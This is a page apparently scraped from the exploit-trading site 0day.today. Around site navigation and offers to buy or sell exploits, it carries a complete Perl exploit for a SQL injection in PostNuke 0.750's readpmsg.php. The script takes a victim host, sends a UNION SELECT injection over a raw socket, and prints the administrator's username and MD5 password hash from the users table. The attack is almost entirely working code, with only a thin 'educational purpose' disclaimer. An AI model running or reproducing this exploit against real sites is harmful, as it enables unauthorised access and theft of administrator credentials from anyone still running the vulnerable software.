0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PostNuke <= 0.750 readpmsg.php SQL Injection Exploit
==================================================== PostNuke <= 0.750 readpmsg.php SQL Injection Exploit ==================================================== #!/usr/bin/perl # This tools is only for educational purpose # # K-C0d3r a x0n3-h4ck friend !!! # # This exploit should give admin nick and md5 password # #-=[ PostNuke SQL Injection version : x=> 0.750]=- #-=[ ]=- #-=[ Discovered by sp3x ]=- #-=[ Coded by K-C0d3r ]=- #-=[ irc.xoned.net #x0n3-h4ck to find me K-c0d3r[at]x0n3-h4ck.org]=- # # Greetz to mZ, 2b TUBE, off, rikky, milw0rm, str0ke # # !!! NOW IS PUBLIC (6-6-2005) !!! use IO::Socket; sub Usage { print STDERR "Usage: KCpnuke-xpl.pl <www.victim.com> </path/to/modules.php>\n"; exit; } if (@ARGV < 2) { Usage(); } if (@ARGV > 2) { Usage(); } if (@ARGV == 2) { $host = @ARGV[0]; $path = @ARGV[1]; print "[K-C0d3r] PostNuke SQL Injection [x0n3-h4ck]\n"; print "[+] Connecting to $host\n"; $injection = "$host\/$path?"; $injection .= "op=modload&name=Messages&file=readpmsg&start=0"; $injection .= "%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null"; $injection .= "%20FROM%20pn_users%20WHERE%20pn_uid=2\/*&total_messages=1"; $socket = new IO::Socket::INET (PeerAddr => "$host", PeerPort => 80, Proto => 'tcp'); die unless $socket; print "[+] Injecting command ...\n"; print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n"; while (<$socket>) { print $_; exit; } } # 0day.today [2024-11-15] #